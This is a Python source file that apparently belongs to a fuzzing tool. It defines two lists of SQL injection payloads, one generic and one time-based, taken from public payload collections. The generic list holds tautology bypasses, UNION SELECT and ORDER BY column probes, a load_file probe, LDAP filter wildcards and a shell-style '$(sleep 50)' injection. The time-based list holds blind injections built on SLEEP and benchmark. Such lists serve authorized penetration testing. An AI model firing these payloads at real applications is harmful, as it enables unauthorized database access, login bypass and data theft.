#!/usr/bin/python3

# Fuzz Payloads
# https://github.com/payloadbox/sql-injection-payload-list
# https://ed4m4s.blog/tools/sql-injection-payloads
fuzzGenericPayloads = [
    "'",
    "\'\'",
    "`",
    "``",
    ",",
    "\"",
    "\"\"",
    "/",
    "//",
    "\\",
    "\\\\",
    ";",
    "' or \"",
    "-- or #",
    "' OR '1",
    "' OR 1 -- -",
    "\" OR \"\" = \"",
    "\" OR 1 = 1 -- -",
    "' OR '' = '",
    "'='",
    "'LIKE'",
    "'=0--+",
    "\" OR 1=1",
    "' OR 'x'='x",
    "' AND id IS NULL; --",
    "'''''''''''''UNION SELECT '2",
    "%00",
    "/*…*/ ",
    "+",
    "||",
    "%",
    "@variable	local variable",
    "@@variable	global variable",
    "AND 1",
    "AND 0",
    "AND true",
    "AND false",
    "1-false",
    "1-true",
    "1*56",
    "-2",
    "1' ORDER BY 1--+",
    "1' ORDER BY 2--+",
    "1' ORDER BY 3--+",
    "1' ORDER BY 1,2--+",
    "1' ORDER BY 1,2,3--+",
    "1' GROUP BY 1,2,--+",
    "1' GROUP BY 1,2,3--+",
    "' GROUP BY columnnames having 1=1 --",
    "-1' UNION SELECT 1,2,3--+",
    "' UNION SELECT sum(columnname ) from tablename --",
    "-1 UNION SELECT 1 INTO @,@",
    "-1 UNION SELECT 1 INTO @,@,@",
    "1 AND (SELECT * FROM Users) = 1",	
    "' AND MID(VERSION(),1,1) = '5';",
    "' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --",
    "/*",
    "-- -",
    ";%00",
    "`",
    "<>\"'%;)(&+",
    "|",
    "!",
    "?",
    "/",
    "//",
    "//*",
    "'",
    "' -- ",
    "1 or 1=1",
    "1;SELECT%20*",
    "1 waitfor delay '0:0:10'--",
    "'%20or%20''='",
    "'%20or%201=1",
    "')%20or%20('x'='x",
    "'%20or%20'x'='x",
    "%20or%20x=x",
    "%20'sleep%2050'",
    "%20$(sleep%2050)",
    "%21",
    "23 OR 1=1",
    "%26",
    "%27%20or%201=1",
    "%28",
    "%29",
    "%2A%28%7C%28mail%3D%2A%29%29",
    "%2A%28%7C%28objectclass%3D%2A%29%29",
    "%2A%7C",
    "||6",
    "'||'6",
    "(||6)",
    "%7C",
    "a'",
    "admin' or '",
    "' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));",
    "' and 1 in (select var from temp)--",
    "anything' OR 'x'='x",
    "\"a\"\" or 1=1--\"",
    "a' or 1=1--",
    "\"a\"\" or 3=3--\"",
    "a' or 3=3--",
    "a' or 'a' = 'a",
    "&apos;%20OR",
    "' having 1=1--",
    "hi or 1=1 --\"",
    "hi' or 1=1 --",
    "\"hi\"\") or (\"\"a\"\"=\"\"a\"",
    "hi or a=a",
    "hi' or 'a'='a",
    "hi') or ('a'='a",
    "'hi' or 'x'='x';",
    "insert",
    "like",
    "limit",
    "*(|(mail=*))",
    "*(|(objectclass=*))",
    "or",
    "' or ''='",
    " or 0=0 #\"",
    "' or 0=0 --",
    "' or 0=0 #",
    "\" or 0=0 --",
    "or 0=0 --",
    "or 0=0 #",
    "' or 1 --'",
    "' or 1/*",
    "; or '1'='1'",
    "' or '1'='1",
    "' or '1'='1'--",
    "' or 1=1",
    "' or 1=1 /*",
    "' or 1=1--",
    "' or 1=1-- ",
    "'/**/or/**/1/**/=/**/1",
    "‘ or 1=1 --",
    "\" or 1=1--",
    "or 1=1",
    "or 1=1--",
    " or 1=1 or ""=",
    "' or 1=1 or ''='",
    "' or 1 in (select @@version)--",
    "or%201=1",
    "or%201=1 --",
]

fuzzTimePayloads = [
    "sleep(0.5)#",
    "1 or sleep(0.5)#",
    "\" or sleep(0.5)#",
    "' or sleep(0.5)#",
    "\" or sleep(0.5)=\"",
    "' or sleep(0.5)='",
    "1) or sleep(0.5)#",
    "\") or sleep(0.5)=\"",
    "') or sleep(0.5)='",
    "1)) or sleep(0.5)#",
    "\")) or sleep(0.5)=\"",
    "')) or sleep(0.5)='",
    "benchmark(500000,MD5(1))#",
    "1 or benchmark(500000,MD5(1))#",
    "\" or benchmark(500000,MD5(1))#",
    "' or benchmark(500000,MD5(1))#",
    "1) or benchmark(500000,MD5(1))#",
    "\") or benchmark(500000,MD5(1))#",
    "') or benchmark(500000,MD5(1))#",
    "1)) or benchmark(500000,MD5(1))#",
    "\")) or benchmark(500000,MD5(1))#",
    "')) or benchmark(500000,MD5(1))#",
    "AND (SELECT * FROM (SELECT(SLEEP(0.5)))bAKL) AND 'vRxe'='vRxe",
    "AND (SELECT * FROM (SELECT(SLEEP(0.5)))YjoC) AND '%'='",
    "AND (SELECT * FROM (SELECT(SLEEP(0.5)))nQIP)",
    "AND (SELECT * FROM (SELECT(SLEEP(0.5)))nQIP)--",
    "AND (SELECT * FROM (SELECT(SLEEP(0.5)))nQIP)#",
    "SLEEP(0.5)#",
    "SLEEP(0.5)--",
    "SLEEP(0.5)=\"",
    "SLEEP(0.5)='",
    "or SLEEP(0.5)",
    "or SLEEP(0.5)#",
    "or SLEEP(0.5)--",
    "or SLEEP(0.5)=\"",
    "or SLEEP(0.5)='",
    "benchmark(500000,MD5(1))",
    "benchmark(500000,MD5(1))--",
    "benchmark(500000,MD5(1))#",
    "or benchmark(500000,MD5(1))",
    "or benchmark(500000,MD5(1))--",
    "or benchmark(500000,MD5(1))#",
    "'\"",
    "AnD SLEEP(0.5)",
    "AnD SLEEP(0.5)--",
    "AnD SLEEP(0.5)#",
    "&&SLEEP(0.5)",
    "&&SLEEP(0.5)--",
    "&&SLEEP(0.5)#",
    "' AnD SLEEP(0.5) ANd '1",
    "'&&SLEEP(0.5)&&'1",
    "ORDER BY SLEEP(0.5)",
    "ORDER BY SLEEP(0.5)--",
    "ORDER BY SLEEP(0.5)#",
    "(SELECT * FROM (SELECT(SLEEP(0.5)))ecMj)",
    "(SELECT * FROM (SELECT(SLEEP(0.5)))ecMj)#",
    "(SELECT * FROM (SELECT(SLEEP(0.5)))ecMj)--",
    "+ SLEEP(0.5) + '",
    "SLEEP(0.5)/*' or SLEEP(0.5) or '\" or SLEEP(0.5) or \"*/"
]